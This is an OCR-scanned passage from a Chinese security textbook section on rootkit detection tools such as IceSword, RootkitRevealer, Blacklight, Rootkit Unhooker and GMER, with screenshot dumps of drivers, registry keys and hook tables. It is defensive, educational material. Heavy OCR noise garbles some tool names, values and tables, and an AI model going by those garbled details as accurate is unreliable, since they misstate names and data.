Rootkit。 运 行 每 个 工具 (大 部 分 是 免费 的 ) 是 正确 检测 和 删除 Rootkit 的 最 佳 方法 。 我 们 建议 使 用 业界 杂志 、 业 界 专家 或 者 安全 
公司 评级 较 高 的 工具 。 但 是 要 谨慎 从 事 ， 因 为 后 台 运 行 所 有 工具 可 能 影响 性 能 。 必 须 达到 一 个 合理 的 平衡 ， 因 为 对 每 个 系统 平衡 
方法 都 不 同 ， 强 烈 建议 进行 试验 。 


谈 到 Rootkit 的 处 理 ， 重 要 的 是 理解 已 经 开发 出 来 的 各 种 防 Rootkit 工 具 。 每 种 工具 提供 的 检测 Rootkit 视 角 都 不 同 。 


10.5.1 实时 检测 与 脱 机 检测 


在 讨论 可 用 的 Rootkit 检 测 工具 之 前 ， 我 们 必须 解释 进行 这 一 分 析 的 背景 。 在 数字 取证 界 ， 实 时 (live) 和 脱 机 (offline) 
这 两 个 术语 分 别 代表 是 在 可 疑 的 系统 上 进行 分 析 ， 还 是 在 实验 室 中 可 疑 系 统 的 复制 品 上 进行 分 析 。 实 时 取证 在 搜集 证 据 的 同时 进 
行 分 析 一 一 在 系统 启动 、 运 行 和 可 以 采集 内 存 的 同时 。 实 时 系统 也 能 收集 恶意 软件 或 者 Rootkit 仍 在 运行 中 的 更 加 全 面 的 数据 ， 
能 够 反映 诸如 从 目录 读 取 或 者 将 文件 写 入 磁盘 这 样 的 实质 性 操作 。 这 些 数 据 还 包括 了 在 实时 分 析 期 间 捕捉 到 的 系统 内 存 变化 。 脱 
机 分 析 在 取证 界 通常 被 称 为 deadbox 取 证 ,包括 了 首先 在 真实 环境 中 收集 数字 化 证 据 ， 然 后 在 另 一 台 机 器 上 分 析 这 些 证 据 。 


这 两 种 分 析 的 重要 区 别 在 于 完成 分 析 的 场所 。 如 果 按 照 实时 风格 在 可 疑 系统 上 进行 分 析 ， 那 么 恶意 软件 有 机 会 污染 证 据 从 而 
污染 分 析 。 我 们 已 经 讨论 过 ，Rootkit 能 够 简单 地 对 命令 行 工 具 如 netstat ( 列 出 入 站 和 出 站 网 络 连 接 、 路 由 表 和 各 种 网 络 相关 状 
态 ) 隐藏 它们 的 进程 。 因 此 ， 如 果 取 证 研究 人 员 依 靠 在 带 有 Rootkit 的 可 疑 系统 上 运行 hetstat， 分 析 就 很 有 可 能 不 正确 或 者 被 有 


=. bJ =| 
意 地 误导 。 


Rootkit 检 测 和 取证 分 析 具 有 同样 的 局 限 性 : 实时 检测 可 能 几乎 总 是 会 被 驻 留 的 Rootkit 所 击 垮 。 因 此 ， 实 时 与 脱 机 的 思路 与 
本 小 节 中 讨论 的 Rootkit 检 测 工具 所 使 用 的 方法 的 选择 有 一 些 关 联 (有 些 工具 采用 了 混合 的 方法 ) 。 实 时 与 脱 机 的 争论 也 是 军备 
竞赛 讨论 的 焦点 ， 因 为 成 功 的 Rootkit 检 测 最 终 取 决 于 一 点 : 哪 一 方 首先 在 系统 上 安装 或 者 执行 。 而 且 ， 脱 机 分 析 的 实现 要 难得 
多 ， 因 为 你 不 能 得 益 于 操作 系统 对 分 析 结 构 、 访 问 数 据 类 型 等 的 帮助 。 所 有 操作 系统 执行 的 功能 都 必须 在 一 个 工具 中 重建 ， 使 脱 
机 分 析 能 够 类 似 于 实时 分 析 。 





10.5.2 System Virginity Verifier 


System Virginity Verifier (SVV) 是 Joanna Rutkowska 编 写 的 一 个 工具 ， 采 用 一 个 独特 的 方法 来 确定 系统 上 是 否 有 一 个 
Rootkit。SVV 检 查 关键 操作 系统 要 素 的 完整 性 以 发 现 可 能 的 入 侵 。 因 为 系统 上 的 每 个 驱动 程序 和 可 执行 程序 都 由 多 个 数据 类 型 


组 成 ，SVV 将 分 析 二 进 制 文件 的 代码 部 分 ， 这 里 包含 了 所 有 可 执行 代码 如 汇编 指令 ，SVV 还 将 分 析 二 进 制 文件 的 文本 段 ， 这 里 包 
含 了 所 有 字符 串 如 模块 名 称 、 函 数 名 称 或 者 按钮 和 窗口 标题 。SVV 将 分 析 并 且 把 装 入 内 存 的 内 核 模块 的 代码 和 文本 段 与 文件 系统 
上 的 物理 表现 进行 比较 ， 如 图 10-2 所 示 。 如 果 在 物理 文件 和 映像 或 者 内 存 中 发 现 的 文件 副本 之 间 发 现 了 差异 ，SVV 确 定 变 化 的 
类 型 并 且 生 成 感染 级 别 警 告 。 感 染 级 别 帮 助 用 户 识别 修改 的 严重 程度 ， 并 确定 修改 是 否 恶 意 。 


0 下 下 下 下 让 正直 于 
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tcpip.sys 
or 0x80000000 


物理 文件 IR 





图 10-2 System Virginity Vetifier 比 较 磁 盘 和 内 存 中 的 驱动 程序 


尽管 这 个 工具 最 后 更 新 于 2005 年 ， 而 且 必 须 从 命令 行 运行 ， 但 是 仍然 很 有 效 ， 并 且 能 够 帮助 技术 型 用 户 理 解 所 生成 的 输 
出 。 而 且 ，SVV 还 论证 了 一 些 Rootkit 检 测 工具 所 碰 到 的 问题 ， 如 在 内 核 模式 中 读 取 其 他 内 核 和 用 户 模式 应 用 程序 所 用 的 内 人 存 。 
读 取 内 存 看 上 去 好 像 是 简单 的 操作 ， 但 是 有 几 个 项 目 会 导致 问题 : 


> _try/ except 的 使 用 将 不 能 保护 系统 免 遭 未 分 页 内 存 中 的 页 面 错 误 。 


- MmIsAddressValid () 的 使 用 将 引入 一 个 竞争 并 且 无 法 访问 交换 内 存 。 





* MmProbeAndLockPages () 的 使 用 可 能 由 于 各 种 原因 使 系统 崩溃 。 
这 意味 着 什么 ”本 质 上 ， 对 于 任何 应 用 程序 ， 访 问 不 属于 自己 的 内 存 ， 即 使 在 只 读 状 况 下 也 是 不 可 靠 的 。 这 使 得 可 靠 地 分 析 
装 入 内 存 的 Rootkit 非 常 困难 。 分 析 内 存 的 唯一 可 靠 方法 是 进行 脱 机 内 存 转 储 。 


10.5.3 IlceSword 和 DarkSpy 


IceSword 和 DarkSpy 也 是 污染 视图 方法 的 检测 程序 ， 但 是 它们 要 求 大 量 的 用 户 交 互 。 例 如 ， 当 前 运行 进程 和 装 入 内 核 模 块 
的 分 析 可 以 在 环境 改变 时 (例如 用 户 打开 一 个 Web 浏 览 器 ) 由 客户 刷新 ( 见 图 10-3) 。 尽 管 这 些 工具 非常 精确 和 详细 ， 但 是 难 
以 使 用 ， 需 要 高 级 的 技巧 。lceSword 用 于 在 真实 机 器 上 的 取证 分 析 过 程 中 研究 未 知 恶 意 软件 的 工作 原理 。 
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File 


FileName 
“raspppoe.sys 
“raspptp.sys 
“TDI.5Y5 
“psched,sys 
“msgpc.sys 
“ptilink,sys 
“raspti,sys 
“rdpdr,sys 
“termdd,sys 
“swenum,sys 
“update.sys 
“mssmbios.sys 
“NDProxy.SYS 
“Fipydisk.sys 
“Fs_Rec.S¥S 
“Null. SYS 
“Beep. SYS 
“vga.sys 
“mnmdd,5Y5 
“RDPCDD,sys 
“Msfs,5Y5 
“Npfs,5Y5 
“rasacd.sys 
“ipsec.sys 


“netbt,sys 
“afd.sys 
“netbios,sys 
“rdbss,sys 
“mrxsmb,sys 
“Fips,5Y5 
“ipnat,sys 
“wanarp.sys 
“cdfs,5Y5 
“dump_atapi,sys 
“dump WMILIB.SYS 


Base 

OxF9B4B000 
OxF9BSB000 
OxF9D33000 
OxF9695000 
OxF9B6B000 
OxF9D43000 
OxF9D46000 
OxF963C000 
OxF9B86000 
OxF9FSB000 
OxF9SE3000 
OxF9F23000 
OxF9B9B000 
OxF9DS3000 
OxF9FSDO00 
OxFA15B000 
OxF9FSFOOO 
OxF9D63000 
OxF9F61000 
OxF9F63000 
OxF9D6B000 
OxF9D73000 
OxF9823000 
OxF6388000 


OxF8308000 
OxF62E6000 
OxF9BBBO00 
OxF82BB000 
OxF824C000 
OxF9BDBO00 
OxF6188000 
OxF9BFBO000 
OxF9C2B000 
OxF614B000 
OxF9F69000 








eSize 
0x00006000 
0x0000C000 
0x00005000 
0x00011000 
0x00009000 
0x00005000 
0x00005000 
0x00031000 
0x0000A000 
0x00002000 
0x00059000 
0x00004000 
0x0000A000 
0x00005000 
0x00002000 
0x00001000 
0x00002000 
0x00006000 
0x00002000 
0x00002000 
0x00005000 
0x00008000 
0x00003000 
0x00013000 





0x00028000 
0x00022000 
0x00009000 
0x00026000 
0x0006F000 
0x00009000 
0x00021000 
0x00009000 
0x00010000 
0x00018000 
0x00002000 


Flags 

0x09104000 
0x09104000 
0x09104000 
0x09104000 
0x09104000 
0x09104000 
0x09104000 
0x09104000 
0x09104000 
0x09104000 
0x09104000 
0x09104000 
0x09104000 
0x09104000 
0x09104000 
0x09104000 
0x09104000 
0x09104000 
0x09104000 
0x09104000 
0x09104000 
0x09104000 
0x09104000 
0x09104000 
0; 00 
0x09104000 
0x09104000 
0x09104000 
0x09104000 
0x09104000 
0x09104000 
0x09104000 
0x09104000 
0x09104000 
0x09104000 
0x09104000 
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50 
51 
52 
53 
54 
55 
56 
57 
58 
59 
60 
61 
62 
63 
64 
65 
66 
67 
68 
69 
70 
7 
72 
73 
75 
76 
77 
78 
79 
80 
81 
82 
83 
84 
85 


\SystemRoot\system32\DRIVERS\raspppoe.sys 
\SystemRoot\system32\DRIVERS\raspptp.sys 
\SystemRoot\system32\DRIVERS\TDI.SYS 
\SystemRoot\system32\DRIVERS\psched.sys 
\SystemRoot\system32\DRIVERS\msgpc. sys 
\SystemRoot\system32\DRIVERS\ptilink, sys 
\SystemRoot\system32\DRIVERS\raspti.sys 
\SystemRoot\system32\DRIVERS\dpdr.sys 
\SystemRoot\system32\DRIVERS\termdd.sys 
\SystemRoot\system32\DRIVERS\swenum.sys 
\SystemRoot\system32\DRIVERS update sys 
\SystemRoot\system32\DRIVERS\mssmbios.sys 
\SystemRoot\System32\Drivers\NDProxy.SYS 
\SystemRoot\system32\DRIVERS|ipydisk.sys 
\SystemRoot\System32\Drivers\Fs_Rec.SYS 
\SystemRoot\System32\Drivers\Null. SYS 
\SystemRoot\System32\Drivers\Beep, SYS 
\SystemRoot\System32\drivers\vga.sys 
\SystemRoot\System32\Drivers\mnmdd.s¥S 
\SystemRoot\System32\DRIVERS\RDPCDD, sys 
\SystemRoot\System32\Drivers\Msfs,SYS 
\SystemRoot\System32\Drivers\Npfs.SYS 
\SystemRoot\system32\DRIVERS\rasacd, sys 
\SystemRoot\system32\DRIVERS\ipsec.sys 





\SystemRoot\system32\DRIVERS|\netbt. sys 
\SystemRoot\System32\drivers\afd.sys 
\SystemRoot\system32\DRIVERS\netbios,sys 
\SystemRoot\system32\DRIVERS\dbss.sys 
\SystemRoot\system32\DRIVERS\mrxsmb.sys 
\SystemRoot\System32\Drivers\Fips, SYS 
\SystemRoot\system32\DRIVERS\ipnat.sys 
\SystemRoot\system32\DRIVERS\wanarp.sys 
\SystemRoot\System32\Drivers\CdFs,SYS 
\SystemRoot\System32\Drivers\dump_atapi.sys 
\SystemRoot\System32\Drivers\dump WMILIB.SYS z 





图 10-3 IceSword 报 告 的 装 入 内 核 驱动 程序 列表 


IceSword 的 特别 之 处 在 于 ， 它 使 用 户 能 够 用 几 种 不 同 的 方式 观察 系统 ， 以 便 确定 Rootkit 的 存在 。 如 图 10-4 所 
示 ，lceSword 人 允许 用 户 真 正 地 浏览 文件 系统 或 者 注册 表 来 发 现 差异 ， 而 不 是 自动 地 尝试 确定 污染 视图 和 可 信 视 图 之 间 的 差异 


你 可 以 在 图 10-4 中 看 到 ， 注 册 表 不 能 看 到 名 为 Rootkit 的 键 值 ， 但 是 lcesword 可 以 通过 它 与 注册 表 的 接口 看 到 。 人 工 比 较 使 
用 一 个 函数 调用 和 另 一 个 函数 调用 的 注册 表 ， 需 要 对 Rootkit 在 注册 表 键 值 或 者 文件 中 的 藏身 之 所 的 深入 理解 。 不 过 ， 使 用 NTFS 
中 的 备用 数据 流 或 者 高 级 的 注册 表 隐藏 方法 可 能 击败 lceSword。 


#; Registry Editor 


ie Favorit 





由 RDPNP Name Type Data 

由 国 RDPWD (ab) (Default) REG_SZ (value not set) 

由 国 RD5essMgr 区 jpependonGroup REG_MULTI_5z 

由 ~ eae ab) DependOnService REG_MULTI_SZ LanmanWorkstation 

H- RemoteRegistry [ab] Description REG 52 Manages the RPC name service database. 
由 -入 RpcLocator [ab]DisplayName REG_SZ Remote Procedure Call (RPC) Locator 
由 -多 | Rpcss R3]ErrorControl REG_DWORD 0x00000001 (1) 

由 G RSVP [ab] ImagePath REG_EXPAND_SZ YSystemRoot%\system32\locator.exe 
由 名 5am5s [ab] ObjectName REG_SZ NT AUTHORITY\NetworkService 

田园 SCardSvr Start REG_DWORD 0x00000003 (3) 

由 Schedule RS] Type REG_DWORD 0x00000010 (16) 

由 加 Secdrv 


mn Oa sedanen 


< “i 
My Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcLocator A: 
BW 2qx0110387 | - |] x| 


File Dump Plugin View Help 




















ives e aa) 
Functions IceSword 
Registry Name Type Data 
+) redbook “Type REG_DWORD 0x1 
由 - 国 RemoteAccess * Start REG_DWORD 0x0 
“ImagePath REG EXP... system32\drivers\rootkit.sys 
“Groups REG_SZ Streams Drivers 
“ErrorControl REG_DWORD 0x1 
* (Default) REG_5Z (value not set) 
Fie I | Ej 








图 10-4 IceSwotd 允 许 查找 Rootkit 隐 藏 的 信息 


除了 lcesword 的 手工 特性 之 外 ， 图 10-4 还 展示 了 一 些 IceSword 的 高 级 技术 ， 用 于 确保 Rootkit 无 法 隐藏 。 例 如 ， 图 10-4 中 
显示 的 窗口 标题 为 “zqxo110387” ， 这 是 应 用 程序 创建 的 随机 值 。Icesword 将 随机 地 为 窗口 和 文件 创建 新 名 称 ， 并 且 将 其 可 执 
行文 件 的 其 他 区 域 随机 化 ， 以 抢先 于 攻击 者 。 


IceSword 并 不 完美 ， 即 使 使 用 人 工 检查 ，Rootkit 也 能 避免 被 发 现 。 在 图 10-5 中 ，lceSword 列 出 了 装 入 到 内 存 的 内 核 模 
RR, 但 是 ， 我 们 为 这 个 例子 安装 的 Rootkit.sys 没 有 被 列 出 ， 而 我 们 知道 它 正在 运行 ， 这 是 因为 Rootkit 对 注册 表 隐 藏 了 自身 。 


zqxo110387 -上 口 | x| 


File Dump Plugin View Help 































= i Eok 
Functions Kernel Module: 103 日 
| FileName Base Size Flags LoadOr, 2 
= “raspppoe.sys OxF9B6B000 0x00008000 0x09104000 ! 
Kemel Module “raspptp.sys OxF9B7B000 0x0000C000 0x09104000 ! 
r raspti.sys OxF9D63000 0x00005000 0x09104000 ! 
ve ? rdbss.sys oxF82FB000 0x00028000 0x09104000 : 
: “rdpdr.sys 0xF971C000 0x00031000 0x09104000 ! 
Startup ? 
al redbook.sys OxF9B4B000 0x0000F000 0x09104000 
am serenum. sys 0xF9EEF000 0x00004000 0x09104000 
Registry “serial,sys OxF9B2B000 0x00010000 0x09104000 E 
File 4 Í | > 





图 10-5 IceSwotd 尽 管 强 大 ， 却 没有 发 现 这 个 Rootkit 


10.5.4 RootkitRevealer 


RootkitRevealer 是 最 时 发 行 的 用 户 友好 工具 之 一 。 这 个 工具 由 Syslnternals (已 经 被 Microsoft 收 购 ) 的 Bryce Cogswell 和 
Mark Russinovich 编 写 ， 使 用 交叉 视图 方法 ， 仅 关注 文件 系统 和 注册 表 。 昌 然 这 个 工具 已 经 被 Microsoft 淘 汰 ， 但 是 仍然 是 识别 
和 了 解 Rootkit 的 好 工具 。 


这 个 工具 的 好 处 是 快速 、 简 单 而 有 效 。 用 户 只 要 运行 这 个 工具 ， 选 择 File|Scan， 然 后 等 待 系统 分 析 。 举 个 例子 ， 图 10-6 
中 ， 尽 管 RootkitRevealer 没 有 扫描 装 入 的 内 核 模块 ， 但 快速 地 检测 隐藏 的 注册 表 键 值 以 及 Rootkit 隐 藏 的 文件 。 






2 & drivers Eek) 


My Documents: i 


e ay Bact < T j Search 4 Folders E- 





My Computer Address | 器 C:\windows\system32\drivers v 8 Go 
Al Name a Type Date Modified 入 
a File and Folder Tasks Â [eS riogdrv.sys System file 8/4/2004 6:00 AM 
a) Ei} Rename this fie = beg System fle 8/4/2004 6:00 AM 
到 rmcast,sys System file 5/8/2008 6:28 AM 
cle 应 Move this file [i] rndismp.sys System file 8/4/2004 6:00 AM 
DY Copy this file [E] rootmdm.sys System file 8/4/2004 6:00 AM 
@ 8 Publish this File to the E) scsiport,sys System file 8/4/2004 6:00 AM 
( Web [E] sdbus.sys System file 8/4/2004 6:00 AM 
Internet 回 E-mail this file 加 :ecdrv.sys System file 11/13/2007 4:25 AM 


Explorer XK Delete this file E] serenum. sys System file 8/4/2004 6:00 AM 
E) serial.sys System file 8/4/2004 6:00 AM 








& RootkitRevealer - Sysinternals: www.sysinternals.com 


Path Timestamp Size Description 

Eg HKU\.DEFAULT \Software\Sysintemals\RootkitR evealer 11/17/2008 2... Obytes Hidden from Windows API. 

g HKUSS-1-5-21-1801674531 -1644491 937-8395221 15-1003\Software\Sysintemals\RootkitRevealer 11/17/2008 2... Obytes Hidden from Windows API. 

yy HKU\S-1-5-18\Software\Sysintemals\RootkitRevealer 11/17/2008 2... Obytes Hidden from Windows API. 

Es HKLM\SECURITY\Policy\Secrets\SAC”* 1/6/2008 10:... Dbytes Key name contains embedded nu... 
cf HKLM\SECURITY‘\Policy\Secrets\SAI* 1/6/2008 10:... Obytes Key name contains embedded nu... 
GY HKLM\SYSTEM\ControlSet001 \Services\rootkit 1/9/2003 5:3... Obytes Hidden from Windows API. 

GY HKLM\SYSTEM\ControlSet002\Services\rootkit 1/9/2003 5:3... Obytes Hidden from Windows API. 

E) C:AWINDOWS\system32\drivers\rootkit. sys 1/9/2009 5:2... 34.25KB Hidden from Windows API. 


Scan complete: 8 discrepancies found. 





图 10-6 ”RootkitRevealet 能 帮助 寻找 隐藏 的 Rootkit 


10.5.5 F-Secure 的 Blacklight 


F-Secure 的 Blacklight 实 施 了 前 面 提 到 的 污染 或 交叉 视图 (cross-view) 方法 ， 是 第 一 种 这 么 做 的 工具 ， 提 供 简单 、 清 晰 和 
友好 的 用 户 界面 。 尽 管 专门 编写 以 避免 或 者 绕 开 依赖 污染 视图 方法 的 检测 框架 的 Rootkit 已 经 可 以 绕 过 Blacklight， 但 是 它 仍然 
有 用 ， 因 为 你 可 以 通过 改名 和 重启 来 “隔离 ”隐藏 的 文件 ， 这 应 该 能 够 阻止 Rootkit 装 入 。 缺 点 是 ， 你 不 能 改 这 些 文件 名 ， 因 为 
Blacklight 自 动 进 行 这 项 工作 。 图 10-7 给 出 了 一 个 例子 。 


F-Secure BlackLight 


“BLACKLIGHT 


ZROOTKIT ELIMINATOR 


Step 2 - Clean hidden items 


| ltemname [Action | Step 1- Scan 
rootkit. sys > Step 2 - Cleaning 
Finish 


Rename Non | 


ọọ Web site | Help 





图 10-7 Blacklight: 简单 而 有 效 的 界面 减少 了 用 户 的 决策 数量 


这 个 工具 的 特殊 之 处 在 于 ， 当 它 第 一 次 发 行 时 ， 使 用 了 一 种 新 颖 的 方法 来 检测 隐藏 进程 的 DKOM Rootkit。Blacklight 并 不 
简单 地 依靠 进程 列表 如 PspCidTable 的 不 同 视 图 ， 而 是 对 每 个 可 能 的 PID 进 行 简单 模式 匹配 (bruteforce) ， 试 图 用 
OpenProcess () 函数 打开 PID。 如 果 OpenProcess () 成 功 而 PID 没 有 出 现在 PspCidTable 或 EPROCESS 列 表 中 ， 这 个 进程 极 
有 可 能 被 有 意 隐 藏 。 


随 着 军备 竞赛 加 剧 ，Rootkit 开 发 人 员 已 经 找到 新 的 绕 过 Blacklight 和 其 他 Rootkit 检 测 工具 的 方法 ，F-Secure 已 经 改变 了 底 
层 算法 和 处 理 方法 。F-Secure Blacklight 现 在 已 经 合并 到 F-Secure 的 保护 技术 中 ， 因 此 没有 必要 将 这 个 Rootkit 检 测 引 警 当成 一 
个 单独 的 工具 。 


10.5.6 Rootkit Unhooker 


Rootkit Unhooker 最 后 一 次 更 新 已 经 是 2007 年 的 事情 了 ， 但 是 仍然 可 以 用 它 来 测试 现 有 的 和 新 的 Rootkit， 将 其 作为 试验 
性 工具 ， 帮 助 你 更 好 地 理解 Rootkit 的 工作 方式 。Rootkit Unhooker 是 高 级 用 户 所 用 的 一 个 工具 。 它 的 功能 既 深 又 广 ， 但 是 广度 
不 如 稍 候 讨 论 的 GMER 工 具 。Rootkit Unhooker 使 用 户 可 以 多 种 方式 帘 探 系统 ， 包 括 查看 SSDT、 影 子 SSDT， 不 通过 OS 而 直接 
访问 硬盘 对 文件 系统 进行 低级 扫描 ， 查 看 进程 表 等 。 在 图 10-8 中 我 们 能 看 到 ，Rootkit Unhooker 能 够 查找 Rootkit 放 置 在 
TCPVIP 协 议 栈 中 的 钩子 。 


只 要 鼠标 右键 单 击 ， 选 择 UnHook Selected， 你 就 可 以 删除 Rootkit 的 TCP/IP 过 滤 。 图 10-9 显 示 Rootkit 被 禁用 ， 代 码 钧 子 


被 删除 。Unhooker 能 够 快速 地 删除 Rootkit 的 功能 而 继续 操作 ， 甚 至 不 需要 删除 Rootkit 本 身 ， 这 显著 地 降低 了 感染 的 影响 。 而 
且 ， 研 究 人 员 在 取证 调查 中 试图 确定 Rootkit 中 的 每 一 个 和 每 一 类 功能 ， 在 这 个 领域 Rootkit Unhooker 能 够 提供 帮助 。 在 这 种 情 
况 下 ， 研 究 人 员 可 能 希望 禁用 钩 子 ， 但 是 仍然 将 驱动 程序 留 在 内 存 中 以 供 分 析 。 


File Action Setup Language Tools Help 
SSDT | Shadow SSDT | Processes | Drivers | Stealth Code | Files | Code Hooks | Report | 


Hooked Object Hook Address and Location Type of Hook 


ntoskrnl,exe+0x00004442 0x804DBAA2-->804DBAA9 - [ntoskrnl.exe] Inline - RelativeJump 
ntoskrnl,exe+0x0000B95C Ox804E295C-->804E293C - [ntoskrnl.exe] Inline - RelativeJump 
ntoskrnl.exe+0x0000BAFO Ox804E24F0-->804E24C7 - [ntoskrnl.exe] Inline - RelativeJump 
tcpip.sys-- >ndis.sys-- >NdisCloseAdapter OxF844EF28-->F9A9B8B0 - [rootkit.sys] IAT modification 
tcpip.sys-- >ndis.sys-->NdisOpenAdapter OxF844EF54-->F949C148 - [rootkit. sys] IAT modification 
tcpip.sys-- >ndis.sys-->NdisRegisterProtocol OxF844EF60-->F9A9BFO00 - [rootkit.sys] IAT modification 
wanarp.sys-- >ndis, sys-- >NdisDeregisterProtocol OxF9C10B1C-->F9A9B89C - [rootkit.sys] IAT modification 
wanarp.sys-- >ndis.sys-- >NdisRegisterProtocol OxF9C10B28-->F9A9BFO00 - [rootkit.sys] IAT modification 
wanarp.sys-- >ndis.sys-- >NdisOpenAdapter OxF9C10B3C-->F9A49C148 - [rootkit.sys] IAT modification 
wanarp.sys-- >ndis.sys-- >NdisCloseAdapter OxF9C10B4C-->F9A9B8B0 - [rootkit.sys] IAT modification 





Detected Hooks: 10 





图 10-8 Rootkit Unhooket 很 强大 ， 需 要 对 操作 系统 的 深入 理解 


File Action Setup Language Tools Help 
SSDT | Shadow SSDT Processes | Drivers Stealth Code Files | Code Hooks | Report 


Hooked Object Hook Address and Location Type of Hook 

ntoskrnl,exe+0x00004442 O0x804DBAA2-->804DBAA9 - [ntoskrnl.exe] Inline - RelativeJump 
ntoskrnl,exe+0x0000B95C O0x804E295C-->804E293C - [ntoskrnl.exe] Inline - RelativeJump 
ntoskrnl,exe+O0x0000BAFO Ox804E2AF0-->804E24C? - [ntoskrnl.exe] Inline - RelativeJump 


UnHook ALL UnHook Selected 





图 10-9 Rootkit Unhooker 可 能 发 现 不 常见 的 钩子 技术 


除了 禁用 或 者 删除 感染 的 方法 之 外 ，Rootkit Unhooker 还 提供 了 导致 蓝屏 死机 (BSOD) 的 功能 。 这 很 重要 ; 取证 调查 可 
能 希望 通过 机 器 的 串 行 口 或 者 USB 接 通 调试 程序 (如 WinDBG) ， 通 过 强制 蓝屏 死机 ， 得 到 崩溃 时 所 有 内 存 的 一 个 副本 。 调 查 者 
接 下 来 可 以 进行 脱 机 内 存 分 析 来 了 解 更 多 Rootkit 的 情况 。 


但 是 Rootkit Unhooker 很 复杂 ， 功 能 丰富 而 且 输 出 非常 繁杂 ， 它 也 不 稳定 ; 并 且 在 某 些 机 器 上 ， 当 你 试图 关闭 应 用 程序 或 
者 进行 一 些 恶意 软件 删除 操作 (例如 去 除 函 数 钧 子 或 者 清除 一 个 文件 ) 时 会 导致 5SOD。 如 果 在 BSOD 的 同时 ， 系 统 有 实际 的 磁 
盘活 动 ， 就 有 可 能 使 系统 无 法 启动 。 


10.5.7 GMER 


GMER 是 为 高 级 的 非 专业 用 户 所 开发 的 。 它 在 单一 工具 中 提供 了 每 种 可 能 的 Rootkit 检 测 方法 。GMER 还 提供 了 有 限 的 清除 
能 力 。 而 且 ， 它 经 常 更 新 ， 由 社区 支持 ， 许 多 防 Rootkit 倡 导 者 都 将 其 推荐 给 试图 确定 系统 是 否 感染 的 用 户 。 特 别 是 ，GMER 在 
启动 时 立即 开始 扫描 系统 。GMER 寻 找 隐藏 文件 、 进 程 、 服 务 ， 以 及 被 挂钩 的 注册 表 键 值 。GMER 具 有 每 种 其 他 Rootkit 检 测 工 
具 的 特性 并 且 自 动 化 其 使 用 。 图 10-10 展 示 了 一 个 GMER 在 没有 任何 用 户 交 互 下 装 入 的 实例 。 


如 图 10-10 所 示 ， 感 染 立 即 被 发 现 并 且 用 色彩 编码 告知 用 户 必须 立即 处 理 这 个 问题 ， 还 可 能 进行 深入 的 系统 扫描 。GMER 容 
易 使 用 ， 并 为 技术 型 的 用 户 提供 所 需 的 工具 ， 这 都 加 速 了 它 的 广泛 使 用 。 如 果 你 希望 调查 一 个 隐藏 的 服务 ，GMER 能 够 通过 调整 
注册 表 禁 用 它 。 其 他 Rootkit 检 测 工具 使 用 删除 隐藏 文件 之 类 的 清除 方法 ，GMER 在 这 方面 也 能 做 得 很 好 。 与 Rootkit Unhooker 


相似 ，GMER 也 允许 用 户 执行 注册 表 或 者 文件 系统 的 低级 扫描 ， 操 作 界 面 很 熟悉 ， 如 图 10-11 所 示 。 低 级 分 析 意 味 着 GMER 不 采 
用 常见 的 API 而 是 通过 存储 在 硬盘 上 的 文件 直接 访问 注册 表 。 


E GMER 1.0.14.14536 
Rootkit/Malware | »>»> | 


F9A49E 390 ZweE numerateKey 
FSASDFOE ZweE numerateV alueKey 
F949D954 ZwQuerpDirectoryFile 
FSASDA7A ZwQueryS ystemlnformation 
\Driver\T cpip \Device\Ip F9AA11CC 
\Driver\T cpip \Device\T cp F94411CC0 
\Driver\T cpip \Device\Udp F9AA11CC 
\Driver\T cpip \Device\Rawlp F94A11CC0 

Service C:\WINDOWS \system32\drivers\rootkit. sys (~ hidden *™ } [BOOT] rootkit 


GMER Registry 


WARNING !!! 
GMER has found system modification, which might have been caused by ROOTKIT activity. 
Dou you want to fully scan your system ? 


EE ee 





图 10-10 ”GMER 已 经 开始 工作 





[Name [Stt |Fienme |Desciption | 


Rasi2tp MANUAL system32\DRIVERS ‘\rasi2tp. sys WAN Miniport (L2TP] 

RasMan MANUAL %SystemRoot%\system32\svchost.exe -k netsvcs Creates a network connection. 

RasPppoe MANUAL system32\DRIVERS \raspppoe. sys Remote Access PPPOE Driver 

Raspti MANUAL system32\DRIVERS \raspti.sys Direct Parallel 

Rdbss SYSTEM system32\DRIVERS \rdbss. sys Rdbss 

RDPCDD SYSTEM System32\DRIVERS\RDPCDD. sys 

RDPDD 

tdpdr MANUAL system32\DRIVERS \rdpdr. sys Terminal Server Device Redirector Driver 
RDPNP 

RDPWD MANUAL 

RDSessMar MANUAL C:\WINDOWS \system32\sessmar.exe Manages and controls Remote Assistance. If thi... 
redbook SYSTEM system32\DRIVERS \redbook. sys Digital CD Audio Playback Filter Driver 
RemoteAccess DISABLED %SystemRoot%\system32\svchost.exe -k netsvcs Offers routing services to businesses in local are... 
RemoteRegistry AUTO %SystemRoot%\system32\syvchost.exe -k Local... Remote Registry 

tkhdrv40 MANUAL Rootkit Unhooker Driver 

rootkit BOOT system32\drivers\rootkit. sys 

RpcLocator MANUAL %SystemRoot%\system32\locator. exe Manages the RPC name service database. 
RpcSs AUTO %5ystemRoot%\system32\svchost -k pess Remote Procedure Call (RPC) 

RSVP MANUAL %SystemRoot%\system32\isvp. exe Provides network signaling and local traffic contr... 
SamSs AUTO *SystemRoot%\system32\sass. exe Security Accounts Manager 

SCardS vr MANUAL %SystemRoot%\System32\$ CardS vr.exe Smart Card 

Schedule AUTO %SystemRoot%\System32\svchost.exe -k netsves Task Scheduler 

Secdry MANUAL system32\DRIVERS \secdrv.sys SafeDisc driver 

seclogon AUTO ZSystemR oot%\System32\svchost.exe -k netsves Secondary Logon 

SENS AUTO %SystemRoot%\system32\syvchost.exe -k netsves System Event Notification 

serenum MANUAL system3 2AA DRIVER SS serenum. sys Serenum Filter Driver 

Serial SYSTEM system32\DRIVERS \serial. sys Serial port driver 

ServiceModelEnd... 

ServiceModelOpe... 

ServiceModelSer... 

Sfloppy SYSTEM 

ClhisnradAnnnan ALITA YE naban D nnt araban IN ab an Lb anbar aa Ni finda Ci 有 him Clarina fl 


图 10-11 GMER 进 行 低级 扫描 ， 查 找 Rootkit 


GMER 从 第 一 次 发 布 时 就 很 有 用 。 因 为 支持 Windows10， 它 是 不 可 或 缺 的 Rootkit 检 测 工具 。 


10.5.8 ”Helios 和 Helios Lite 


Helios 和 Helios Lite 是 MIEL Labs 开 发 的 Rootkit 检 测 工 具 。 这 两 个 工具 使 用 相似 的 Rootkit 检 测 方法 。Helios 是 一 个 用 于 主 
动 检测 和 修补 Rootkit 的 驻 留 程序 ， 而 Helios Lite 是 一 个 独立 的 二 进 制程 序 ， 能 够 快速 地 扫描 系统 以 发 现 SSDT 钧 子 、 隐 藏 进程 、 
